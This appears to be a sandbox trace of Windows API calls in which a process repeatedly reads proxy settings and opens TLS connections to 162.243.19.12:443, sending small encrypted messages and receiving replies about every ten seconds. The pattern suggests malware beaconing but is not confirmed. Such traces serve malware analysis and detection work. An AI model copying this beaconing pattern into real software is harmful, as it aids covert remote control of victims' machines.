	[0279.767] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e4904928, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4908518, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e4908538, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e4908538, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0279.767] recv (in: s=0x7cc, buf=0x233e4908628, len=5, flags=0 | out: buf=0x233e4908628*) returned 5
	[0279.767] recv (in: s=0x7cc, buf=0x233e490864d, len=1, flags=0 | out: buf=0x233e490864d*) returned 1
	[0279.767] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e4904928, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4908720, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e4908740, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e4908740, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0279.767] recv (in: s=0x7cc, buf=0x233e4908830, len=5, flags=0 | out: buf=0x233e4908830*) returned 5
	[0279.768] recv (in: s=0x7cc, buf=0x233e4908855, len=48, flags=0 | out: buf=0x233e4908855*) returned 48
	[0279.768] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e4904928, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4908958, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e4908978, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e4908978, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0279.770] FreeContextBuffer (in: pvContextBuffer=0x233e399b560 | out: pvContextBuffer=0x233e399b560) returned 0x0
	[0279.770] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e4908ac0 | out: pBuffer=0x233e4908ac0) returned 0x0
	[0279.770] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e4908b18 | out: pBuffer=0x233e4908b18) returned 0x0
	[0279.770] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e4908b80 | out: pBuffer=0x233e4908b80) returned 0x0
	[0279.771] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0279.771] CertDuplicateStore (hCertStore=0x233fc6835c0) returned 0x233fc6835c0
	[0279.771] CertEnumCertificatesInStore (hCertStore=0x233fc6835c0, pPrevCertContext=0x0) returned 0x233fc67feb0
	[0279.771] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0279.771] CertEnumCertificatesInStore (hCertStore=0x233fc6835c0, pPrevCertContext=0x233fc67feb0) returned 0x0
	[0279.772] CertCloseStore (hCertStore=0x233fc6835c0, dwFlags=0x0) returned 1
	[0279.772] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0279.773] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc683690
	[0279.773] CertAddCRLLinkToStore (in: hCertStore=0x233fc683690, pCrlContext=0x233fc67feb0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0279.774] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc67feb0, pTime=0x350199b4c8, hAdditionalStore=0x233fc683690, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0279.775] CertDuplicateCertificateChain (pChainContext=0x233fc6fef90) returned 0x233fc6fef90
	[0279.776] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0279.777] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0279.778] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0279.778] CertFreeCertificateChain (pChainContext=0x233fc6fef90) 
	[0279.778] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233fc6fef90, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0279.778] SetLastError (dwErrCode=0x0) 
	[0279.778] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233fc6fef90, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0279.779] CertFreeCertificateChain (pChainContext=0x233fc6fef90) 
	[0279.780] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0279.780] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e490b788, MessageSeqNo=0x0 | out: pMessage=0x233e490b788) returned 0x0
	[0279.781] CoTaskMemAlloc (cb=0x20) returned 0x233fc64fcf0
	[0279.781] WSASend (in: s=0x7cc, lpBuffers=0x233fc64fcf0*=((len=0x3b, buf=0x233e4908a48*), (len=0xd5, buf=0x233e490b590*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc64fcf0*=((len=0x3b, buf=0x233e4908a48*), (len=0xd5, buf=0x233e490b590*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0279.781] CoTaskMemFree (pv=0x233fc64fcf0) 
	[0279.781] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0279.781] recv (in: s=0x7cc, buf=0x233e490b930, len=5, flags=0 | out: buf=0x233e490b930*) returned 5
	[0280.238] recv (in: s=0x7cc, buf=0x233e490b955, len=1488, flags=0 | out: buf=0x233e490b955*) returned 1488
	[0280.238] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e490c038, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e490c038, pfQOP=0x0) returned 0x0
	[0280.240] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0280.240] SetEvent (hEvent=0x6b4) returned 1
	[0280.286] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa80
	[0293.295] CloseHandle (hObject=0xa80) returned 1
	[0293.530] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0xa80) returned 0x0
	[0293.531] RegOpenKeyExW (in: hKey=0xa80, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0xa5c) returned 0x0
	[0293.531] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xe4
	[0293.531] RegNotifyChangeKeyValue (hKey=0xa5c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xe4, fAsynchronous=1) returned 0x0
	[0293.532] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x25c) returned 0x0
	[0293.532] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x270
	[0293.532] RegNotifyChangeKeyValue (hKey=0x25c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x270, fAsynchronous=1) returned 0x0
	[0293.533] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa70) returned 0x0
	[0293.533] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa64
	[0293.533] RegNotifyChangeKeyValue (hKey=0xa70, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa64, fAsynchronous=1) returned 0x0
	[0293.533] GetCurrentProcess () returned 0xffffffffffffffff
	[0293.533] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0x394) returned 1
	[0293.534] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc68c3e0
	[0293.534] WinHttpSetTimeouts (hInternet=0x233fc68c3e0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0293.534] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0293.549] SetEvent (hEvent=0x6b4) returned 1
	[0293.549] select (in: nfds=0, readfds=0x233e4913a30, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e4913a30, writefds=0x0, exceptfds=0x0) returned 1
	[0293.550] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0293.552] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0293.554] shutdown (s=0x7cc, how=2) returned 0
	[0293.564] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0293.564] closesocket (s=0x7cc) returned 0
	[0293.565] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0293.565] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0xa58
	[0293.566] WSAConnect (in: s=0x7cc, name=0x233e49151c8*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0293.678] closesocket (s=0xa58) returned 0
	[0293.679] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e4912170, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e4915a50, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e4915a50, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0293.682] FreeContextBuffer (in: pvContextBuffer=0x233fc686d20 | out: pvContextBuffer=0x233fc686d20) returned 0x0
	[0293.682] send (in: s=0x7cc, buf=0x233e4915b20*, len=333, flags=0 | out: buf=0x233e4915b20*) returned 333
	[0293.683] recv (in: s=0x7cc, buf=0x233e4915b20, len=5, flags=0 | out: buf=0x233e4915b20*) returned 5
	[0293.790] recv (in: s=0x7cc, buf=0x233e4915b25, len=49, flags=0 | out: buf=0x233e4915b25*) returned 49
	[0293.791] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e4912170, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4915d60, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e4915d80, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e4915d80, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0293.792] recv (in: s=0x7cc, buf=0x233e4915e70, len=5, flags=0 | out: buf=0x233e4915e70*) returned 5
	[0293.792] recv (in: s=0x7cc, buf=0x233e4915e95, len=1, flags=0 | out: buf=0x233e4915e95*) returned 1
	[0293.792] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e4912170, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4915f68, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e4915f88, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e4915f88, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0293.793] recv (in: s=0x7cc, buf=0x233e4916078, len=5, flags=0 | out: buf=0x233e4916078*) returned 5
	[0293.793] recv (in: s=0x7cc, buf=0x233e491609d, len=48, flags=0 | out: buf=0x233e491609d*) returned 48
	[0293.793] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e4912170, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e49161a0, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e49161c0, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e49161c0, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0293.795] FreeContextBuffer (in: pvContextBuffer=0x233e399cac0 | out: pvContextBuffer=0x233e399cac0) returned 0x0
	[0293.795] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e4916308 | out: pBuffer=0x233e4916308) returned 0x0
	[0293.796] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e4916360 | out: pBuffer=0x233e4916360) returned 0x0
	[0293.796] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e49163c8 | out: pBuffer=0x233e49163c8) returned 0x0
	[0293.797] CertDuplicateCertificateContext (pCertContext=0x233fc680330) returned 0x233fc680330
	[0293.797] CertDuplicateStore (hCertStore=0x233fc683420) returned 0x233fc683420
	[0293.797] CertEnumCertificatesInStore (hCertStore=0x233fc683420, pPrevCertContext=0x0) returned 0x233fc680330
	[0293.798] CertDuplicateCertificateContext (pCertContext=0x233fc680330) returned 0x233fc680330
	[0293.798] CertEnumCertificatesInStore (hCertStore=0x233fc683420, pPrevCertContext=0x233fc680330) returned 0x0
	[0293.798] CertCloseStore (hCertStore=0x233fc683420, dwFlags=0x0) returned 1
	[0293.799] CertFreeCertificateContext (pCertContext=0x233fc680330) returned 1
	[0293.800] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc6824b0
	[0293.800] CertAddCRLLinkToStore (in: hCertStore=0x233fc6824b0, pCrlContext=0x233fc680330, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0293.801] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc680330, pTime=0x350199b4c8, hAdditionalStore=0x233fc6824b0, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0293.804] CertDuplicateCertificateChain (pChainContext=0x233fc6ff590) returned 0x233fc6ff590
	[0293.807] CertDuplicateCertificateContext (pCertContext=0x233fc680330) returned 0x233fc680330
	[0293.808] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0293.810] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0293.810] CertFreeCertificateChain (pChainContext=0x233fc6ff590) 
	[0293.810] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233fc6ff590, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0293.811] SetLastError (dwErrCode=0x0) 
	[0293.811] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233fc6ff590, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0293.811] CertFreeCertificateChain (pChainContext=0x233fc6ff590) 
	[0293.812] CertFreeCertificateContext (pCertContext=0x233fc680330) returned 1
	[0293.812] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e4918fd0, MessageSeqNo=0x0 | out: pMessage=0x233e4918fd0) returned 0x0
	[0293.812] CoTaskMemAlloc (cb=0x20) returned 0x233fc650110
	[0293.812] WSASend (in: s=0x7cc, lpBuffers=0x233fc650110*=((len=0x3b, buf=0x233e4916290*), (len=0xd5, buf=0x233e4918dd8*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc650110*=((len=0x3b, buf=0x233e4916290*), (len=0xd5, buf=0x233e4918dd8*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0293.813] CoTaskMemFree (pv=0x233fc650110) 
	[0293.813] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0293.813] recv (in: s=0x7cc, buf=0x233e4919178, len=5, flags=0 | out: buf=0x233e4919178*) returned 5
	[0294.332] recv (in: s=0x7cc, buf=0x233e491919d, len=1488, flags=0 | out: buf=0x233e491919d*) returned 1488
	[0294.332] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e4919880, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e4919880, pfQOP=0x0) returned 0x0
	[0294.333] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0294.333] SetEvent (hEvent=0x6b4) returned 1
	[0294.365] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa80
	[0303.371] CloseHandle (hObject=0xa80) returned 1
	[0303.720] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0xa80) returned 0x0
	[0303.720] RegOpenKeyExW (in: hKey=0xa80, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0xa5c) returned 0x0
	[0303.721] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xe4
	[0303.721] RegNotifyChangeKeyValue (hKey=0xa5c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xe4, fAsynchronous=1) returned 0x0
	[0303.722] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x25c) returned 0x0
	[0303.723] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x270
	[0303.723] RegNotifyChangeKeyValue (hKey=0x25c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x270, fAsynchronous=1) returned 0x0
	[0303.725] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa70) returned 0x0
	[0303.726] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa64
	[0303.726] RegNotifyChangeKeyValue (hKey=0xa70, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa64, fAsynchronous=1) returned 0x0
	[0303.726] GetCurrentProcess () returned 0xffffffffffffffff
	[0303.726] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0x394) returned 1
	[0303.727] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc68b720
	[0303.728] WinHttpSetTimeouts (hInternet=0x233fc68b720, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0303.728] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0303.750] SetEvent (hEvent=0x6b4) returned 1
	[0303.751] select (in: nfds=0, readfds=0x233e4921278, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e4921278, writefds=0x0, exceptfds=0x0) returned 1
	[0303.752] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0303.754] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0303.758] shutdown (s=0x7cc, how=2) returned 0
	[0303.780] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0303.780] closesocket (s=0x7cc) returned 0
	[0303.782] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0303.783] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0xa58
	[0303.783] WSAConnect (in: s=0x7cc, name=0x233e4922a10*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0303.895] closesocket (s=0xa58) returned 0
	[0303.896] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e491f9b8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e4923298, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e4923298, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0303.899] FreeContextBuffer (in: pvContextBuffer=0x233fc6878a0 | out: pvContextBuffer=0x233fc6878a0) returned 0x0
	[0303.899] send (in: s=0x7cc, buf=0x233e4923368*, len=333, flags=0 | out: buf=0x233e4923368*) returned 333
	[0303.906] recv (in: s=0x7cc, buf=0x233e4923368, len=5, flags=0 | out: buf=0x233e4923368*) returned 5
	[0304.049] recv (in: s=0x7cc, buf=0x233e492336d, len=49, flags=0 | out: buf=0x233e492336d*) returned 49
	[0304.050] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e491f9b8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e49235a8, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e49235c8, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e49235c8, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0304.051] recv (in: s=0x7cc, buf=0x233e49236b8, len=5, flags=0 | out: buf=0x233e49236b8*) returned 5
	[0304.051] recv (in: s=0x7cc, buf=0x233e49236dd, len=1, flags=0 | out: buf=0x233e49236dd*) returned 1
	[0304.051] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e491f9b8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e49237b0, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e49237d0, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e49237d0, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0304.052] recv (in: s=0x7cc, buf=0x233e49238c0, len=5, flags=0 | out: buf=0x233e49238c0*) returned 5
	[0304.052] recv (in: s=0x7cc, buf=0x233e49238e5, len=48, flags=0 | out: buf=0x233e49238e5*) returned 48
	[0304.052] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e491f9b8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e49239e8, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e4923a08, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e4923a08, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0304.055] FreeContextBuffer (in: pvContextBuffer=0x233e399c340 | out: pvContextBuffer=0x233e399c340) returned 0x0
	[0304.056] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e4923b50 | out: pBuffer=0x233e4923b50) returned 0x0
	[0304.056] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e4923ba8 | out: pBuffer=0x233e4923ba8) returned 0x0
	[0304.057] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e4923c10 | out: pBuffer=0x233e4923c10) returned 0x0
	[0304.058] CertDuplicateCertificateContext (pCertContext=0x233fc680130) returned 0x233fc680130
	[0304.059] CertDuplicateStore (hCertStore=0x233fc682cd0) returned 0x233fc682cd0
	[0304.059] CertEnumCertificatesInStore (hCertStore=0x233fc682cd0, pPrevCertContext=0x0) returned 0x233fc680130
	[0304.059] CertDuplicateCertificateContext (pCertContext=0x233fc680130) returned 0x233fc680130
	[0304.059] CertEnumCertificatesInStore (hCertStore=0x233fc682cd0, pPrevCertContext=0x233fc680130) returned 0x0
	[0304.059] CertCloseStore (hCertStore=0x233fc682cd0, dwFlags=0x0) returned 1
	[0304.060] CertFreeCertificateContext (pCertContext=0x233fc680130) returned 1
	[0304.061] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc682240
	[0304.061] CertAddCRLLinkToStore (in: hCertStore=0x233fc682240, pCrlContext=0x233fc680130, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0304.061] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc680130, pTime=0x350199b4c8, hAdditionalStore=0x233fc682240, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0304.066] CertDuplicateCertificateChain (pChainContext=0x233fc6feb10) returned 0x233fc6feb10
	[0304.069] CertDuplicateCertificateContext (pCertContext=0x233fc680130) returned 0x233fc680130
	[0304.070] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0304.071] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0304.071] CertFreeCertificateChain (pChainContext=0x233fc6feb10) 
	[0304.071] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233fc6feb10, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0304.071] SetLastError (dwErrCode=0x0) 
	[0304.071] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233fc6feb10, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0304.073] CertFreeCertificateChain (pChainContext=0x233fc6feb10) 
	[0304.073] CertFreeCertificateContext (pCertContext=0x233fc680130) returned 1
	[0304.073] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e4926818, MessageSeqNo=0x0 | out: pMessage=0x233e4926818) returned 0x0
	[0304.074] CoTaskMemAlloc (cb=0x20) returned 0x233fc64fb40
	[0304.074] WSASend (in: s=0x7cc, lpBuffers=0x233fc64fb40*=((len=0x3b, buf=0x233e4923ad8*), (len=0xd5, buf=0x233e4926620*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc64fb40*=((len=0x3b, buf=0x233e4923ad8*), (len=0xd5, buf=0x233e4926620*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0304.074] CoTaskMemFree (pv=0x233fc64fb40) 
	[0304.075] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0304.075] recv (in: s=0x7cc, buf=0x233e49269c0, len=5, flags=0 | out: buf=0x233e49269c0*) returned 5
	[0304.589] recv (in: s=0x7cc, buf=0x233e49269e5, len=1488, flags=0 | out: buf=0x233e49269e5*) returned 1488
	[0304.589] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e49270c8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e49270c8, pfQOP=0x0) returned 0x0
	[0304.591] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0304.591] SetEvent (hEvent=0x6b4) returned 1
	[0304.649] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa80
	[0311.660] CloseHandle (hObject=0xa80) returned 1
